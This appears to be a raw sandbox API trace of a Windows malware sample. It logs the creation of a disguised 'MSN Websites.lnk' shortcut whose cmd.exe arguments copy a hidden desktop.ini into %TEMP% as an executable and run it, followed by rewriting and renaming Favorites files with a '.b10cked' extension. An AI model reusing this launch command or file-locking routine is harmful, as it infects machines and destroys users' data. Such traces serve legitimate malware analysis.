[0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x48\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0214.584] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0214.584] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0214.584] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0214.584] CharUpperBuffW (in: lpsz="explorer.exe \"MSN Websites\" & type \"MSN Websites\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x69 | out: lpsz="EXPLORER.EXE \"MSN WEBSITES\" & TYPE \"MSN WEBSITES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x69 [0214.584] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0214.585] CharUpperBuffW (in: lpsz="explorer.exe \"MSN Websites\" & type \"MSN Websites\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6a | out: lpsz="EXPLORER.EXE \"MSN WEBSITES\" & TYPE \"MSN WEBSITES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6a [0214.585] CharUpperBuffW (in: lpsz="[EXE_NAME]", 
cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0214.585] CoInitialize (pvReserved=0x0) returned 0x0 [0214.585] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0214.586] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0214.586] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0214.586] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"MSN Websites\" & type \"MSN Websites\\desktop.ini\" > \"%TEMP%\\q8ZbmX1H.exe\" && \"%TEMP%\\q8ZbmX1H.exe\"") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0214.588] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0214.588] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0214.588] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\MSN Websites.lnk", fRemember=0) returned 0x0 [0214.594] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0214.594] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0214.594] ShellLink:IUnknown:Release 
(This=0x1d3e18) returned 0x0 [0214.594] CoUninitialize () [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.595] ReleaseMutex (hMutex=0xf8) returned 1 [0214.595] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27138527059) returned 1 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.596] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.597] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.597] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.598] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.598] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.599] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.599] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.599] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.599] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0214.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Entertainment.url", lpUsedDefaultChar=0x0) returned 21 [0214.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.604] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.605] CloseHandle (hObject=0x120) returned 1 [0214.609] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL") returned 0x2f [0214.609] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.610] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x914, dwThreadId=0xe40)) returned 1 [0214.611] CloseHandle (hObject=0x1b4) returned 1 [0214.611] CloseHandle (hObject=0x120) returned 1 [0214.611] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.611] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.611] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN 
WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.611] ReleaseMutex (hMutex=0xf8) returned 1 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.611] ReleaseMutex (hMutex=0xf8) returned 1 [0214.611] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.612] ReleaseMutex (hMutex=0xf8) returned 1 [0214.612] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.612] ReleaseMutex (hMutex=0xf8) returned 1 [0214.612] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27140118925) returned 1 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.612] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.614] SetFilePointer 